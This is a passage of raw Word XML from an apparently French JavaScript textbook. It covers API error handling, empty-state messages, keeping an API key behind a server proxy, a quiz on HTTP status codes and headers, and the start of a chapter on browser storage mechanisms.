          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 30.2 — Afficher un état vide plutôt qu'une erreur</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Une recherche sans résultat renvoie un tableau vide.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Distinguez 404, tableau vide et erreur.</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Rédigez trois messages différents.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Prévoyez une action dans chaque cas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 30.3 — Protéger une clé d'API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   SÉCURITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le code contient </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>const CLE = "sk_live_..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et appelle l'API directement.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Expliquez le risque.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Proposez une architecture.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Montrez l'échange avec un proxy.</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30.1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class ErreurApi extends Error {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  constructor(message, statut, corps) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    super(message);</w:t>
        <w:br/>
        <w:t xml:space="preserve">    this.name = "ErreurApi";</w:t>
        <w:br/>
        <w:t xml:space="preserve">    this.statut = statut;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    this.corps = corps;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>async function api(chemin, { methode = "GET", corps, ...reste } = {}) {</w:t>
        <w:br/>
        <w:t>const options = { method: methode, ...reste, headers: { Accept:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "application/json" } };</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (corps !== undefined) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    options.headers["Content-Type"] = "application/json";</w:t>
        <w:br/>
        <w:t xml:space="preserve">    options.body = JSON.stringify(corps);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:br/>
        <w:t xml:space="preserve">  let reponse;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  try {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    reponse = await fetch(chemin, options);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  } catch (e) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    throw new ErreurApi("Réseau indisponible", 0, null);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (reponse.status === 204) return null;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  const donnees = await reponse.json().catch(() =&gt; null);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (!reponse.ok) {</w:t>
        <w:br/>
        <w:t>throw new ErreurApi(donnees?.message ?? `HTTP ${reponse.status}`,</w:t>
        <w:br/>
        <w:t xml:space="preserve">      reponse.status, donnees);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return donnees;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un statut 0 distingue clairement l'échec réseau de toute réponse HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Le </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>.catch(() =&gt; null)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> protège contre un corps vide ou non JSON sur une réponse d'erreur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 30.2</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function rendreEtat(resultats, erreur) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (erreur) return { titre: "Service indisponible",</w:t>
        <w:br/>
        <w:t xml:space="preserve">                       action: "Réessayer", classe: "etat--erreur" };</w:t>
        <w:br/>
        <w:t xml:space="preserve">  if (!resultats.length) return { titre: "Aucun résultat",</w:t>
        <w:br/>
        <w:t>action: "Modifier la recherche", classe: "etat--vide" };</w:t>
        <w:br/>
        <w:t xml:space="preserve">  return null;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un tableau vide n'est pas une erreur : l'utilisateur doit pouvoir agir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un service indisponible propose de réessayer ; un résultat vide propose de changer la requête.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 30.3</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Navigateur → votre serveur → API tierce</w:t>
        <w:br/>
        <w:t>// Le navigateur n'envoie jamais la clé</w:t>
        <w:br/>
        <w:t>const r = await fetch("/api/traduire", {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  method: "POST",</w:t>
        <w:br/>
        <w:t xml:space="preserve">  headers: { "Content-Type": "application/json" },</w:t>
        <w:br/>
        <w:t xml:space="preserve">  body: JSON.stringify({ texte, langue: "en" }),</w:t>
        <w:br/>
        <w:t>});</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Côté serveur (pseudo-code)</w:t>
        <w:br/>
        <w:t>// const r = await fetch("https://api.tiers/v1/traduire", {</w:t>
        <w:br/>
        <w:t>//   headers: { Authorization: `Bearer ${process.env.CLE_API}` },</w:t>
        <w:br/>
        <w:t>// });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La clé reste dans une variable d'environnement du serveur, jamais dans le paquet JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le proxy applique aussi la limitation de débit et la validation, ce qui protège le compte de l'abus.</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>fetch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rejette-t-il la promesse sur un 404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Oui</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 xml:space="preserve">Non, il faut vérifier </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>reponse.ok</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Seulement en mode strict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Uniquement pour une API</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 signifie le code 422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Non authentifié</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Validation échouée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Trop de requêtes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Introuvable</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Quel en-tête indique le format du corps envoyé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Accept</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Content-Type</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Authorization</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Cache-Control</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Où stocker une clé d'API secrète dans une application front-end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Dans une variable JS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 xml:space="preserve">Dans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>localStorage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Nulle part : côté serveur</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Dans un commentaire</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 faire face à un code 429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Réessayer immédiatement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 xml:space="preserve">Attendre en respectant </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Retry-After</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Changer de méthode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Ignorer</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Seules les erreurs réseau provoquent un rejet ; un 404 est une réponse valide avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ok: false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</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La requête est bien formée mais les données sont invalides.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Accept</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> décrit ce qu'on souhaite recevoir ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> décrit ce qu'on envoie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tout code livré au navigateur est public : la clé doit rester sur un serveur.</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Le serveur indique le délai à respecter avant un nouvel essai.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>31. Stockage, état et persistance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Conserver des préférences entre deux visites et organiser les données d'une interface sans les disperser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 2 h 45 · Niveau : Intermédiaire · Prérequis : chapitre 30</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Choisir entre </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>localStorage</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sessionStorage</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>, IndexedDB et cookies.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Sérialiser et versionner des données persistées.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Organiser l'état d'une interface en un lieu unique.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Synchroniser plusieurs onglets.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Respecter la vie privée et les limites de stockage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>31.1 Quatre mécanismes, quatre usages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le navigateur offre plusieurs espaces de stockage. Aucun n'est universel : chacun a une durée, une capacité et des règles d'accès différentes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.96 — Cinq mécanismes de stockage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218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Mécanisme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="204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Capacité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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Durée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Accès</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2185"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>localStorage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>5 à 10 Mo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2322"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Jusqu'à suppression</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Synchrone, JS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="218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sessionStorage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="204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5 à 10 Mo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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Onglet ouvert</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Synchrone, JS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2185"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>IndexedDB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Centaines de Mo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2322"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Jusqu'à suppression</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Asynchrone, JS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="218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Cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="204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4 Ko</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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Selon </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Expires</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Envoyé au serveur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2185"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Cache API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2049"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2322"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Jusqu'à suppression</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Service worker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Trois API, trois portées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localStorage : préférences durables</w:t>
        <w:br/>
        <w:t>localStorage.setItem("theme", "sombre");</w:t>
        <w:br/>
        <w:t>const theme = localStorage.getItem("theme");     // "sombre" ou null</w:t>
        <w:br/>
        <w:t>localStorage.removeItem("theme");</w:t>
        <w:br/>
        <w:t>localStorage.clear();                            // tout effacer</w:t>
        <w:br/>
        <w:br/>
        <w:t>// sessionStorage : état d'un parcours</w:t>
        <w:br/>
        <w:t>sessionStorage.setItem("etape", "2");</w:t>
        <w:br/>
        <w:br/>
        <w:t>// Cookie : transmis automatiquement au serveur</w:t>
        <w:br/>
